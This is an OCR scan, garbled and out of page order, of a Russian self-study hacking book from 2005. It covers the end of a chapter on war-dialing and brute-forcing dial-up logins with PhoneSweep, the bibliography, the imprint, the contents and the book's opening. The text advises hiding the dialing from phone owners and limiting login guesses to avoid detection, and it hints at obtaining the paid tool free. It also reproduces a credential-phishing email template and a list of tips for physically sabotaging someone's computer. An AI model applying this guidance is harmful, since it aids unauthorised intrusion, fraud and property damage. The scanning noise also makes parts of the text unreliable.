Первоначальный выбор времени исполнения звонков выполняется при добавле-нии телефонного номера в список телефонных номеров. Для этого следует вдиалоге Add Phone Numbers (Добавить номера телефона) (Рис. 11.7) установитьсоответствующие флажки: Business (Рабочее), Outside (Нерабочее), Weekend(Выходные).

Программа PhoneSweep позволяет уточнить время и порядок сканирования но-меров, создавая правила прозвона телефонов организации в строго определенноевремя, скажем, в нерабочее время или в выходные дни, с указанием числа попы-ток и длительности ожидания ответа. Создание правил прозвона реализуется на

186

Page 183: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

вкладке Time (Время), подчиненной вкладке Setup (Параметры), представлен-ной на Рис. 11.8.

И |п|хFile View Help

>. • вStart Stop Rescon

III!

i~~&~~~* a it в » s1 ц?Save Revert Default Import Export Report Graph Dist What’s this?

| 7%

Ehone Numbers |BesuKs | Status || history ]~S~etup

Profiles I Modems I [lime] | Effort | Dialing у Remste || Alerts I

Time Period Start Hrs Minutes End Mrs MinutesBusiness Hours: 09

9

Blackout Hours: 00

aioo н lie ai59 ыТЗГЕПЗ loo aioo и

Weekends: Q Monday Q TuesdayD WednesdayD ThursdayQ Friday

0 Saturday 0 Sunday

Import Time Periods: 0 Business 0 Outside 0 Weekend

Delay Between Calls fs 3 Seconds Time Period Rings Seconds

Business: 4 » or 50

Outside: 10 ‘ or 92

Weekend: 10 — or |92

E!s ШВШШШВШа1+4ШМ1Ш11Ш1

PMC. 77.5. Вклада планирования времении порядка прозвана телефонных номеров

В полях Business Hours (Рабочее время) и Blackout Hours (Исключенное время)следует указать, соответственно, рабочее время и время, в течение которого бу-дут временно прекращены звонки, запланированные на рабочее время.

Флажки в разделе Weekends (Выходные) позволяют указать выходные дни не-дели (по умолчанию установлены суббота и воскресенье). В разделе Import TimePeriod (Период времени импорта) указывается время прозвона импортирован-ных списков телефонных номеров, не содержащих указаний о конкретном вре-мени их сканирования.

В правой нижней части вкладки Time (Время) содержатся два столбца Rings(Звонки) и Seconds (Секунды), в которых следует указать длительность прозво-на одного номера, задав либо число звонков, либо длительность ожидания отве-та, причем отдельно для каждого временного периода. Эти периоды указаны встроках Business (Рабочее время), Outside (Нерабочее время) и Weekend(Выходные). Например, на Рис. 11.8 указано, что в нерабочее время следует про-званивать номер либо 10 раз, либо в течение 92 сек.

Таким образом, с помощью вкладки Time (Время) можно очень точно настроитьработу по прозвону номеров, по возможности скрыв ее от владельцев телефонов.Ну а что относительно идентификации и взлома доступа к удаленной системе?Для этого следует обратиться к другой вкладке — Effort (Режим).

187

Page 184: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Настройка режима Взлома

Вкладка Effort (Режим) представлена на Рис. 11.9.

и] PhoneSweep 4 4 Demo — localhost — DEFAULT

File View Help

X • вStart Stop Rescon

1111Save Revert Default

a Вmport Export Report Graph

N?What’s this?

Ehone Numbers |j Besults |i Status^ Histoiy J Setyp |_

Proges ][Modgini | IlmeJ Eton [ ginlirig | Remale_

Current Effort Level:

Connectto answering phone numbersthen disconnect immediately.

Set Level:

Scan For:

Connect

Modems Only 3

Penetrate Level Options:

Maximum Guesses Per Username Per Day:

Maximum Calls Per Number Per Day:

El Recycle Names

El Find Modems First

Username (Passwordroot password

rootguess

syzygy123

Puc. 11.9. Вкладка задания режима прозвана

Как видно из Рис. 11.9, здесь имеется все необходимое, чтобы взлом удаленнойсистемы прошел как можно более эффективно и был безболезненным для жерт-вы. В открывающемся списке Set Level (Установить уровень) можно выбрать,следует ли просто подсоединиться к телефону (пункт Connect (Соединиться)),или же попытаться идентифицировать удаленную систему (пункт Identity(Идентификация)), или же попытаться взломать доступ к системе (пунктPenetrate (Проникнуть)). При этом открывающийся список Scan For (Сканиро-вать) позволяет выбрать режим поиска модемов и/или факсимильных аппаратов,что немаловажно для различных применений (бессмысленно, к примеру, пы-таться взломать доступ к факсимильному аппарату, не так ли?).

В разделе Penetrate Level Options (Параметры уровня проникновения) можнонастроить режим проникновения в удаленную систему, т.е. настроить процедурувзлома грубой силой. В открывающемся списке Maximum Guesses Per User-name Per Day (Максимум попыток для одного логина в день) следует указатьчисло попыток проникновения в удаленную систему с отдельным именем поль-зователя (логином) в течение дня. Это важно для обхода системы защиты, по-скольку ясно, что один человек не может пытаться зарегистрироваться в системецелый день — такие попытки выдадут хакера с головой. С другой стороны,нельзя переборщить с числом звонков по одному номеру, так что следует

188

Page 185: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

выбрать максимальное число звонков в открывающемся списке Maximum CallsPer Number Per Day (Максимальное число звонков в день по одному номеру).

Комбинации логин/пароль, используемые для проникновения в систему, хранятсяв файле bruteforce.txt, и его содержимое отображается в правом нижнем углувкладки Effort (Режим), представленной на Рис. 11.9. Этот список можно попол-нить и откорректировать, щелкая на кнопках Add (Добавить) и Del (Удалить).А порядком тестирования пар логин/пароль можно управлять установкой флажкаRecycle Names (Перебор имен). Установка флажка Recycle Names (Переборимен) вынуждает программу PhoneSweep проверять каждую комбинациюлогин/пароль к каждому удаленному компьютеру, иначе проверяется толькоединственная комбинация логин/пароль.

Наконец, установка флажка Find Modems First (Вначале найти модемы) вынуж-дает программу PhoneSweep перед началом попыток проникновения прозвонитьвсе телефоны из указанного набора и найти линии с подключенными модемами.В противном случае попытки проникновения будут выполняться перед прозво-ном следующего номера.

Программа PhoneSweep поставляется вместе с несколькими файлами, содержа-щими комбинации пароль/логин. Эти файлы таковы.

• bruteforce.txt: Этот файл содержит список пар логин/пароль, используемыхPhoneSweep для попыток проникновения в систему. Для модификации и по-полнения этого файла пользователям предоставляется утилита brutecreate.exe,запускаемая из командной строки и позволяющая комбинировать пары ло-гин/пароль с целью пополнения файла bruteforce.txt.

• systemdefault.txt: Этот файл содержит список стандартных пар логин/пароль,широко используемых операционными системами. Для применения этогофайла следует скопировать его содержимое (или его часть) в файлbruteforce.txt.

• largebrute.txt: Этот файл содержит словарь паролей, который наиболее частоиспользуют хакеры.

• largebruteback.txt: Этот файл содержит те же самые слова, что и в файлеlargebrute.txt, но написанные в обратном порядке.

Кроме описанных возможностей, программа PhoneSweep предоставляет множе-ство других функций, очень полезных и содержательных для хакинга удаленныхсистем. Однако с основными функциями вы уже познакомились — и теперь ни-какая удаленная система не устоит перед вашим натиском! Проблема, однако, втом, что PhoneSweep стоит ныне около 1000$, и, хотя ее стоимость снизилась с2800$ в 2002 году, все-таки для большинства людей покупка PhoneSweep не-доступна. Но не стоит отчаиваться! К моменту выхода этой книги в свет все мо-жет измениться — так что, прочитав эти строки, откройте страничку какой-либо

189

Page 186: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

поисковой машины, введите в строку поиска волшебное слово PhoneSweep — и,быть может, проблемы поиска рабочей версии программы решатся сами собой.

Есть и другой вариант действий — с помощью широко распространенных про-грамм сканирования THN-Scan или ToneLock прозванивать телефонные номера ипытаться по получаемым откликам угадать, какая система принимает вашизвонки. Далее, можно сделать и так — написать сценарий перебора паролей и за-пустить его с помощью популярной программы Login Hacker (примеры сценариевможно найти, например, в [3]). Однако все это делается руками, и толком все этипрограммы работают лишь на старых, уже ушедших в историю системах…Так что будем надеяться на лучшее — на рынке программ-сканеров телефонныхномеров следует ожидать новинок.

Например, пока писалась эта книга, появилась новая утили-та сканирования телефонных номеров TeleSweep Secure(http://www.securelogix.com) компании Secure Logix.OdnaKO, кро-ме описания в [14], никаких сведений о TeleSweep Secure авторудобыть не удалось — очевидно, следует немного подождать.

ЗаключениеТелефонные линии, подключенные через модем к компьютерной системе, — са-мый надежный путь для проникновения в локальную сеть организации. Причинасостоит в принявшей массовый характер нелегальной установке модемов — дляработы с рабочим компьютером сидя дома. Добавьте сюда наличие множествазабытых и заброшенных линий, полное пренебрежение правилами компьютер-ной безопасности, царящее в большинстве организаций, — и вы поймете, почемув средствах массовой информации то и дело мелькают сообщения о взломах се-тей разных финансовых учреждений.

Описанная в этой главе программа PhoneSweep — это наиболее мощное средстводля решения задач проникновения в удаленную систему, известное на сегодня,и, скорее всего, это только первая ласточка. Программа PhoneSweep полезна какхакеру, так и антихакеру, поскольку тестирование телефонных номеров организа-ции — это надежный способ проверки наличия дыр в системе защиты компьютер-ной системы от удаленного проникновения. Такое тестирование избавит многихрадетелей за собственную безопасность от иллюзий по поводу недоступности ихсистемы, которая, как показывает мировой опыт, никогда не бывает абсолютной.

190

Page 187: Самоучитель хакера подробное иилюстрированное руководство

Список литературы1. Выпуски журнала «Хакер» за 2000-2003 гг.

2. Лукацкий А.В. Обнаружение атак — СПб.: «БХВ-Петербург», 2001. — 624 с.: ил.

3. Мак-Клар С., Скембрей Д., Курц Д. Секреты хакеров. Безопасность сетей -готовые решения, 2-е изд.: Пер. с англ. — М.: Издательский дом «Вильяме»,2001.- 656 с.: ил. — Парал. титл. англ.

4. Мак-Клар С., Скембрей Д., Курц Д. Секреты хакеров. Безопасность Windows2000 — готовые решения.; Пер. с англ. — М.: Издательский дом «Вильяме»,2002.- 264 с.: ил. — Парал. титл. англ.

5. Леонтьев Б. Компьютерный террор. Методы взлома информационныхсистем и компьютерных сетей. — 560 с. — М.: Познавательная книга плюс,2002.- (Справочное руководство пользователя персонального компьютера).

6. Р. Браг. Система безопасности Windows 2000.: Система безопасностиWindows 2000.: Пер. с англ. — М.: Издательский дом «Вильяме», 2001. — 592с.: ил. — Парал. тит. англ.

7. Alex JeDaev Я люблю компьютерную самооборону. Учебное пособие — М.:Только для взрослых, 2002 — 432 с.: ил.

8. Чирилло Дж. Обнаружение хакерских атак. Для профессионалов (+CD). -СПб.:Питер, 2002. — 864 с.: ил.

9. Бэнкс М.А. Информационная защита ПК.: Пер. с англ. — К.: Век+, М.:Энтроп, СПб.: Корона-Принт, 2001.- 272 с.

10. Леонтьев Б. Хакинг без секретов. Серия книг «Справочное руководствопользователя персонального компьютера» — М.: Познавательная книга плюс,2000. — 736 с.

11. Скембрей Д., Шема М. Секреты хакеров. Безопасность Web-приложений -готовые решения.; Пер. с англ. — М.: Издательский дом «Вильяме», 2003.-384 с.: ил. — Парал. титл. англ.

.; ! • ‘ • . : ’12. М. Мамаев, С. Петренко «Технология защиты информации в Интернете.

Специальный справочник» — СПб.: Питер. 2002. — 848 с.: ил.

13. Атака через Интернет — Семианов, Медведевский.

14. Мак-Клар С., Скембрей Д., Курц Д. Секреты хакеров. Безопасность сетей -готовые решения, 3-е изд.: Пер. с англ. — М.: Издательский дом «Вильяме»,2002.- 736 с.: ил. — Парал. титл. англ.

Page 188: Самоучитель хакера подробное иилюстрированное руководство

СамоучительХАКЕРА

Отдел распространения издательской группы «ТРИУМФ»(«Издательство Триумф», «Лучшие книги», «Только для взрослых», «Технолоджи — 3000», «25 КАДР»)

Телефон: (095) 720-07-65, (095) 772-19-56. E-mail: [email protected]Интернет-магазин: www.3st.ru

КНИГА-ПОЧТОЙ: 125438, г.Москва, а/я 18 «Триумф». E-mail: [email protected]

ОТВЕТСТВЕННЫЕ ЗА ПЕРЕГОВОРЫ:

Региональные магазины — директор по развитию Волошин Юрий

Московские магазины — главный менеджер Малкина Елена

Оптовые покупатели — коммерческий директор Марукевич Иван

Идея, план и примеры книги Alex Atsctoy.

Дизайн обложки Борис Клюйко.

Корректор Е.В. Акиева.

Верстка О.В. Новикова.

ООО «Лучшие книги». 125438, г. Москва, а/я 18.Лицензия серия ИД № 00033 от 10.08.99 г.

Подписано в печать с оригинал-макета 12.01.2005 г.Формат 70х100’/|б- Печать офсетная. Печ. л. 12.

Заказ № 5830.

Тираж 3 500 экз.

Отпечатано в полном соответствии с качеством предоставленных диапозитивовв ОАО «Можайский полиграфический комбинат»

143200, г. Можайск, ул. Мира, 93

Page 189: Самоучитель хакера подробное иилюстрированное руководство

Издательская группа «ТРИУМФ» представляетЛУЧШИЕ КНИГИ ДЛЯ ВАШЕГО МАГАЗИНА

Интернет-магазин

www.3st.ru

ISBN 5 — 9 3 6 7 3 — 0 3 6 — 0« Е Ёа 8г. «Iм *

я <=>•?•

SSIos-

о 6S 3

i!t.

«7 8 5 93 6 «73 03 68 I

Телефон для товароведов: (095) 720 07 65 E-mail: [email protected]

Самоучитель

хакера

ПОДРОБНОЕ
ИЛЛЮСТРИРОВАННОЕ

РУКОВОПСТВО

Alex Atsctoy

Самоучитель
ХАКЕРА
Подробное иллюстрированное руководство

«Лучшие книги»
Москва

УДК 004.056.53(075.8)
ББК 32.973.202-08я78-1+32.973.2б-018.2я78-1
АЗЗ

Alex Atsctoy.
АЗЗ Самоучитель хакера : подроб. иллюстрир. рук.: [учеб, пособие] /
Alex Atsctoy. — М.: Лучшие книги, 2005. — 192 с.: ил. —
ISBN 5-93673-036-0.
Агентство CIP РГБ

Что нового привносит в общий поток хакерской литературы эта небольшая книга? А то, что в ней вся необъятная тема хакинга рассмотрена в
единственном, но самом важном аспекте — практическом.

Посетите наш Интернет-магазин
®
«Три ступеньки »: www.3st.ru
E-mail: post@triumph.ru

ISBN 5-93673-036-0

© ООО «Лучшие книги», 2005
© Обложка ООО «Лучшие книги», 2005
© Верстка и оформление ООО «Лучшие книги», 2005

Краткое содержание
Глава 1. ХакиИГ

8

Глава 2. Зашита Windows ZOOO/Xf.

25

Глава з. «Проникновение Ъ систему

37

Глава4. Сокрытиеследод

57

Глава5. Хзкинг fyay^epofc Web

73

Глава 6. Деструкция почтового клиента

83

Глава 7. XaKUHflCQ

99

Глава 8. Хакинг Web~caumo&

115

Глава9. AmaKU’PoS

143

Глава ю. Хакингкомпьютеров
Windows 2000/Xf

160

Глава 11. Хакииг коммутируемого доступа

176

Список литературы

191

Содержание
Глава 1.Хзки«Г …………………………………………………………………………………. 8
Хакеры и антихакеры ……………………………………….. . ………………………………………….. 9
Что это такое — хакинг? ……………………………………………………………………………………… 10
Как хакеры все это делают ………………………………………………………………………………….. 13
Инструменты хакинга …………………………………………………………………………………… 16
Социальная инженерия …………………………………………………………………………………………. 16
Предварительный сбор информации ……………………………………………………………………… 17
Взломщики паролей доступа к файлам ………………………………………………………………….. 75
Атака клиентов Web …………………………………………………………………………………………….. 19
Атака серверов Web ……………………………………………………………………………………………… 20
Сетевые сканеры …………………………………………………………………………………………………. 21
Перехват сетевого трафика ………………………………………………………………………………… 21
Встроенные средства операционной системы ………………………………………………………. 22
Программы-экстойты …………………………………………………………………………………………. 22
Вирусы и трояны ………………………………………………………………………………………………….. 23
Заключение ………………………………………………………………………………………………….. 23

Глава 2. 23Ш1ШЗ WmdOMS 2OOO/XP. ………………………………………. 25
Аутентификация ………………………………………………………………………………………….. 25
Авторизация ………………………………………………………………………………………………… 26
Аудит …………………………………………………………………………………………………………… 27
Как работает защита Windows 2000/XP …………………………………………………………. 28
База SAM ……………………………………………………………………………………………………………… 29
Объекты системы защиты ………………………………………………………………………………….. 30
Активный каталог ……………………………………………………………………………………………….. 31
Регистрация в домене Windows 2000 …………………………………………………………………….. 33
Антихакинг ………………………………………………………………………………………………….. 35
Заключение ………………………………………………………………………………………………….. 36

Главаз.Проиикио&еииеЪсистему………………………………………….з?
Загрузка со съемного носителя ……………………………………………………………………… 38
Утилита NTFSDOS Pro ………………………………………………………………………………………… 39
Взлом базы SAM …………………………………………………………………………………………………… 44
Взлом доступа к файлам и папкам ………………………………………………………………………… 47
Пароли за строкой ******** ………………………………………………………………………………… 50
Создание потайных ходов …………………………………………………………………………….. 51
Добавление учетных записей ………………………………………………………………………………… 52
Автозагрузка утилит …………………………………………………………………………………………… 53
Клавиатурные шпионы …………………………………………………………………………………………. 53
Заключение
……………………………………………………………………………………
.. 56

Содержание

Глава 4. Сокрытие следов

57

Два аспекта задачи сокрытия следов
Локальная безопасность
Глобальная безопасность
Прокси-серверы
Сокрытие следов атаки
Отключение аудита
Очистка журналов безопасности
Заключение

58
59
63
66
68
69
70
72

Глава 5. Хзкииг £раузеро& Web
Злонамеренный код HTML
Подмена Web-сайтов
Методы социальной инженерии
Заключение

73
74
78
81
82

Глава 6. Деструкция почтового клиента

83

Мейлбомберы
Снаряжение м ейлбомбера
Атака клонов
Ковровое бомбометание списками рассылки
Дополнительные вооружения мейлбомбера
Подбор паролей к почтовому ящику
Методы социальной инженерии
Заключение

83
85
88
89
90
91
96
97

Глава 7. ХакиИГ ICQ

99

Аськины угрозы
Экспериментальная интрасеть с сервисом ICQ
СпуфингиГК
Определение IP-адреса и порта ICQ-клиента
ICQ-флудеры
Взлом сервера ICQ
ICQ-крякеры
Методы социальной инженерии
Заключение

100
101
102
103
104
106
111
112
113

Самоучитель хакера

Глава 8. ХзКМНГ We|?~C3UmO&

115

Функционирование Web-сайта
Этапы хакинга Web-сайта
Исследование Web-сайта
Предварительный сбор данных
Сканирование и инвентаризация сервера
Взлом сервера IIS 5
ХакингНТТР
Уязвимые сценарии
Web-спайдер Teleport Pro
Мастер создания нового проекта
Настройка свойств проекта
Исследование кода HTML
Взлом доступа к страничкам Web
Заключение

115
116
118
119
120
122
123
125
131
132
136
138
139
142

Глава 9. Ahl3KU «РоЗ

143

Разновидности атак DoS
Атаки насыщением полосы пропускания
ФлудериОР
Флудер!8МР
Флудер Smurf.
Атаки на истощение ресурсов
Атаки некорректными сетевыми пакетами
Атаки Nuke
Атаки Teardrop
Атаки Ping of Death
Атаки Land
Атаки фальсифицированными сетевыми пакетами
Защита от атак DoS
Заключение

144
145
145
147
148
149
151
752
154
154
755
155
756
159

Глава 10. Хзкииг компьютеров Windows 2ООО/ХР.

ш

Сканирование сети TCP/IP
Инвентаризация сети
Нулевой сеанс.
Реализация цели
Проникновение в систему
6

160
162
762
165
765

Содержание
Расширение прав доступа и реализация атаки
Приложение NetBus
Сокрытие следов
Заключение

168
169
173
175

Глава п. Хзкиигкоммутируемого доступа

176

Источники номеров телефонов
Сканер PhoneSweep 4.4
Диалог PhoneSweep 4.4
Верхняя горизонтальная панель инструментов
Вертикальная панель инструментов
Значки в строке состояния
Работа с программой PhoneSweep
Правила прозвана
Заключение

177
178
179
180
782
185
186
186
190

Слисок литературы

ш

Г Л А В А 1.

Хзкииг
Допустим, вы — обычный человек, использующий компьютер на работе и дома
для решения тех задач, для которых он, собственно, и предназначен его создателями. В том числе, вы любите путешествовать по Интернету, а также переписываться со своими друзьями и знакомыми по электронной почте. И вот, в один
прекрасный день к вам приходит письмецо примерно такого содержания (пример взят из журнала «Хакер»).
Уважаемый пользователь!!!
К сожалению, на Вашем счету был обнаружен факт двойного доступа к нашему серверу, т.е. в одно и то же время, используя Ваш аккаунт, в систему вошли 2 (два) пользователя. Вследствие чего возникла необходимость в смене Вашего текущего пароля доступа к
нашей сети.
Вам необходимо ответить на это письмо, используя следующий
формат:
log: ваш логин
ор: ваш старый пароль
пр1: ваш новый пароль
пр2: ваш новый пароль
em: ваш e-mail
Эти сведения должны находиться в начале Вашего сообщения.
Обратите внимание на то, что новый пароль должен быть повторен
дважды! Это необходимо для точной идентификации Вашего аккаунта. Рекомендуется прислать свои сведения до 13.06.1999, т.к. по
истечении этого срока возможно отключение Вашего аккаунта.
Желаем Вам успехов!!!
С уважением,
администрация сервера http://www.super-internet-provider.ru
Ваши дальнейшие действия определят ваш статус в том увлекательном и многообразном мире, который называется уже примелькавшимися терминами «киберпространство» или «виртуальное пространство». Если вы аккуратно заполните
указанные позиции и отошлете письмо обратно, то вы — «ламер», или, того хуже, «лох», которого «напарили» проворные ребята, называющие себя «хакерами», «хацкерами», и даже «кул хацкерами». После этого знаменательного события вам, скорее всего, придется смириться с потерей некоей суммы денег,
которую вы заплатили своему провайдеру Интернета за возможность подсоединяться к серверу Интернета и рассматривать на экране компьютера всякие
разные Web-странички с интересными картинками.

Хакинг
Однако вас можно и поздравить с боевым крещением — вы впервые столкнулись
с тем, что называется «хакингом». Пусть вы и проиграли первую схватку — ничего, за одного битого двух небитых дают. У вас все еще впереди, и если вы не
сломитесь от первой неудачи, то, быть может, еще выйдете победителем в сражении, которое непрерывно ведется на просторах киберпространства почти с
самого момента его возникновения.
Это сражение ведется за обладание информацией — некой неощутимой и невесомой субстанцией, продуктом технического и научного прогресса человеческой
цивилизации, возникшем еще на самой заре ее возникновения. В этой великой
битве за информационные ресурсы во все времена и народы принимало и принимает участие две стороны — обладатель информации, и, скажем так, «претендент» на ее обладание. И чего только не было придумано за многие века, чтобы
получить доступ к информации и одновременно, защитить информацию от посягательств разного рода охотников за чужими секретами! Эта борьба велась не
на жизнь, а на смерть, с использованием любых способов и приемов, и ценой
победы подчас становились судьбы целых народов.
И вот были изобретены компьютеры, вначале громоздкие и маломощные, потом все более миниатюрные и высокопроизводительные. Последний шаг был
сделан совсем недавно буквально у всех на глазах — за считанные годы, начиная примерно с 80-х годов прошедшего века, на столе у многих людей по всему земному шару появились персональные компьютеры, и, что еще интереснее, появилась всемирная компьютерная сеть — Интернет, связывающая эти
компьютеры воедино.
И вот тут то все и началось.

Хакеры и антихакеры
Суть произошедших перемен заключается в том, что ныне вся деятельность, посвященная подготовке и хранению информации, или уже переместилась, или
активно перемещается на компьютеры. Люди постарше помнят заваленные бумагами канцелярии и всякие разные конторы, заставленные письменными столами, за которыми сидело множество людей, строчивших бумаги. Далее эти бумаги печатались на машинках (ну и шум там стоял!), подшивались в папки и
ложились на полки шкафов и стеллажей на радость тараканам и мышам.
А теперь посмотрим на современный офис — вместо счетов и ручных калькуляторов
(да-да, именно так это и было!) ныне на рабочих столах с современным дизайном
стоят персональные компьютеры, и множество сидящих за компьютерами людей
признаются, что уже просто отвыкли от использования ручек и карандашей.
На этих компьютерах делается все то, что называется обработкой информации,
под которой подразумевается практически все — от подготовки документации на

9

Самоучитель хакера
суперсекретный прибор до составления расписания на пригородную электричку,
от хранения банковских счетов до составления бухгалтерских отчетов. А для
передачи всей этой, подчас, совершенно секретной, информации используются
компьютерные сети, пришедшие на замену дискетам, жестким дискам и прочим
носителям данных, активно применяемых на первых этапах всеобщей компьютеризации. Таким образом, вся та информация, которая ранее пересылалась в
бумажных конвертах по почте, теперь передается в виде электрических сигналов
по проводам компьютерной сети, или пучков света по оптоволоконным кабелям,
или электромагнитного излучения в беспроводной сети, ну и так далее — сетевые
технологи не стоят на месте.
Итогом всех этих революционных преобразований стал тот неоспоримый факт,
что все сражения великой битвы за информационные ресурсы были немедленно
перенесены на виртуальные просторы киберпространства. Теперь вместо обшаривания пыльных шкафов в поисках нужной бумаги с чертежами секретного
прибора или финансового отчета компании, эти самые «претенденты» на обладание засекреченной информацией занялись взломом систем защиты компьютерных систем. Вместо набора отмычек, фонарика и веревочной лестницы, используемых для проникновения в канцелярские помещения, заставленные неуклюжими шкафами и сейфами, современные взломщики, сидя за компьютерами,
пытаются подсоединиться к секретной базе данных на сервере корпоративной
сети, находясь от нее на расстоянии в тысячи километров. Вместо установки
жучков в телефоны руководства корпорации они, сидя в подвале, подсоединяются к проводам локальной сети организации и перехватывают всю передаваемую по сети информацию, надеясь получить файл с секретными данными или
пароли доступа к закрытому сетевому ресурсу. Технические средства изменились, но суть осталась прежней — как и в реальном мире, в киберпространстве
ведется отчаянная борьба за обладание информацией, причем не на жизнь, а на
смерть, с применением любых методов и приемов.
Однако информационная революция конца 20-го века привнесла в эту схватку и
нечто новое — хакинг.

Что это такое г хакииг?
ЕСЛИ раньше великая битва за информацию, в том числе с применением компьютеров, велась профессионалами, преследующими какие угодно, но, в любом
случае, рациональные цели — например, шпионаж — то массовое вторжение в
нашу жизнь компьютеров вовлекло в это сражение целую ораву самой разношерстной публики, которая, не имея никакого понятия о булевой алгебре и
принципах работы сумматора центрального процессора ЭВМ (все, все — больше
не буду) получила доступ к весьма мощному и эффективному вычислительному
устройству, работа с которым ранее считалась уделом яйцеголовых интеллек-

10

Хакинг
туалов. Именно в этой среде возникли первые хакеры и зародилось такое интересное направление компьютерной деятельности, как хакинг — получение доступа к закрытой информации с целями, которые можно назвать до некоторой степени иррациональными.
Действительно, почитайте выпуски журнала «Хакер», и вы удивитесь многообразию вариантов использования компьютеров новоявленными бойцами информационных сражений. Вот пример «приложения» сил некоторых из участников
великой компьютерной битвы (пример из журнала «Хакер»).
Если твой друг ламер, то над его машиной можно произвести следующие действия:
• Поменять ВСЕ кнопки на клавиатурах (произвольно, см. раздел фишки).
• Раскрутить корпус мыши, вытащить шарик, отсоединить провод от
микросхемы, свинтить корпус обратно.
• Разбить Hard DISK [используя прогу Маздая Fdisk.exe] на n-ое количество логических дисков (сколько хард позволит, желательно побольше) и свалить все на вирус.
• Заклеить кулер СКОТЧЕМ покрепче! А после, используя суперклей,
приклеить его к процу навсегда!
• Начать форматирование и во время процесса [ 24% ] выключить
комп из сети, используя кнопочку POWER — его харду хана!
• Позагибать зубцы IDE-контроллеров на мамке.
Часть «советов» была отброшена, как устаревшая. Надеюсь, также, что вы догадались, что ламер — это нечто вроде «слабака», личности жалкой и убогой, недостойной работы на компьютере, кулер — это вентилятор, HARD DISK или
хард — это жесткий диск, прога — это программа, проц — процессор, а мамка это материнская плата. Самым интересным словом в этом «опусе» является
Маздай, что является исковерканной фразой на английском языке «Must die», в
вольном переводе означающей «Чтоб он сдох». В хакерской терминологии
Маздаем называется операционная система Windows, которая как раз и должна
умереть, по мнению автора этих «советов».
Слово Маздай для нас интересно в том смысле, что оно хорошо иллюстрирует
направленность мыслей личностей, занимающихся такого рода проделками.
В самом деле, зачем Windows должна умереть? Ну, запортилась операционная
система или сломался жесткий диск, тебе-то что с того? Можно только предположить, что в новейшую историю на великую битву за информационные ресурсы были рекрутированы, в том числе, личности весьма специфического склада,
которые в былые годы морально удовлетворялись стрельбой из рогатки по прохожим или истязаниями кошек в подвале.

11

Самоучитель хакера
И в самом деле, кто же занимается такими шалостями? Вот портрет одного из
столпов этой новой волны в молодежной культуре 21 века (журнал «Хакер»).
Имя: Доктор Добрянский
Особые приметы:
Лысый обугленный череп с клочками растительности и обрывками
проводов, черные глаза без белков, длинное худое гибкое тело,
хаотичная походка, пронзительный взгляд, неожиданные и резкие
броски на прохожих. Был одет в рваный радиоактивный халат, непонятный головной убор и кеды «Скороход».
История:
За изобретение и распространение смертоносных девайсов сослан
в сибирскую тайгу строгать матрешки из цельных кедров, но за хорошее поведение переведен на Заполярную АЭС в зону реактора.
В результате несчастного случая отдельные микросхемы Доктора
закоротило. Выдрав с корнем главный рубильник станции, совершил побег, попутно искусав охрану АЭС, трех белых медведей и
одного моржа.
Деятельность:
Тяжелые электротехнические мутации. Вскрывает различные кнопки и подключает к ним не известные науке устройства. Обещает
множественные оргазмы особям, нажавшим на эти кнопки. Подсоединяет к дверям миниатюрные нестабильные реакторы. Начиняет
мусоропроводы, тоннели и лифты высоковольтными фидерами,
рубильниками и переключателями. Хочет подсоединить всех и вся к
родной АЭС.
Хобби: модификация женского мозга посредством микропрограмм,
распространяемых по электронной почте.
Впечатляет, не правда ли? Однако возникает вопрос — а при чем здесь всемирная
война за обладание ценной информации, всякие хлопоты по поиску информации, взлому систем защиты компьютерных систем и прочие не такие уж и простые вещи? Неужели хакинг состоит в заклеивании «кулера» скотчем и в прочих
увлекательных проделках, про которые можно почитать во многих выпусках
журнала «Хакер»?
А при том, что все это — не более чем миф.
Прежде чем сделать выводы относительно феномена хакинга, следует обратиться к серьезным исследованиям по этой теме, проводимой, как следовало ожидать, разными правительственными спецструктурами, озабоченными… ну и так
далее. И вот, исследовав ту часть населения США, которая устойчиво посвящает
себя всякого рода штучкам в киберпространстве, ФБР (надеюсь, вы знаете, что
это такое) составило среднестатистический портрет хакера. Оказалось, что:
12

Хакинг
• Средний хакер — это молодой человек, возраста примерно от 16 до 19 лет.
• Большая часть (до 80%) этих молодых людей относятся к той части человеческих типов, которых называют английским словом «nerd». Это словечко
имеет два значения: 1) тормоз, зануда; 2) человек со всепоглощающим
стремлением к учебе и научной деятельности. (Интересно, не правда ли?
Все это как-то не вяжется с обликом доктора Добрянского).
• Средний хакер досконально знает операционные системы Windows и Unix,
глубоко освоил стеки протоколов TCP/IP и программирование на нескольких
языках, например, C++, Perl, Basic.
Никак не претендуя на полноту и окончательность выводов, попытаемся подытожить все эти исследования следующим образом. Возникший совсем недавно виртуальный мир — это все еще плохо освоенная территория, что-то вроде дикого запада Америки 19-го века. И каждому путешественнику по киберпространству,
особенно по молодости, хочется попробовать свои силы на просторах этой дикой
прерии, вторгаясь на территории, занятые чужими племенами и поселениями.
Если на входе в эту территорию стоит шлагбаум с табличкой «Проход закрыт», то
люди, перешагнувшие через шлагбаум, становятся на тернистый путь хакера.
Особое место занимают люди, перешагивающие через шлагбаумы по роду службы, но они-то, как раз, хакерами себя и не называют.
Все зависит от вашего отношения к шлагбаумам, к людям, которые их устанавливают, а также с какой стороны шлагбаума вы живете. В зависимости от этого обитатели виртуального мира разделились на две категории — на хакеров и всех прочих, назовем их, для симметрии, «антихакерами». Вы сами должны определиться,
с кем вам по пути. Чтобы помочь вам определиться, в книге сделана попытка простого и доступного описания основных приемов и методов, к которым прибегают
обе стороны — как хакеры, так и антихакеры — при выяснении отношений.
Стоит сделать некоторые уточнения. Под хакерами мы будем впредь понимать
профессионалов, способных проникать сквозь все заграждения, которые устанавливаются на подступах к заветному информационному ресурсу, а эти заграждения весьма серьезная вещь. Антихакерами же мы будем называть профессионалов, способных противостоять этим попыткам хакерского проникновения к закрытому информационному ресурсу. И борьба между хакерами и антихакерами ведется ни на
жизнь, а на смерть, с применением любых средств и тактических приемов.

Как хакеры все это делают
Итак, хакеру требуется получить доступ к желанному компьютерному ресурсу,
т.е. пробраться на чужую, хорошо огороженную территорию. Следует сразу
отметить, что реальные хакерские атаки отличаются от описанной выше заманчивой картинки настолько, насколько реальные боевые столкновения отличаются от их голливудских интерпретаций. Все дело в том, что нынче потен-

13

Самоучитель хакера
циальные жертвы тоже не сидят без дела, и готовы разобраться с нежеланными
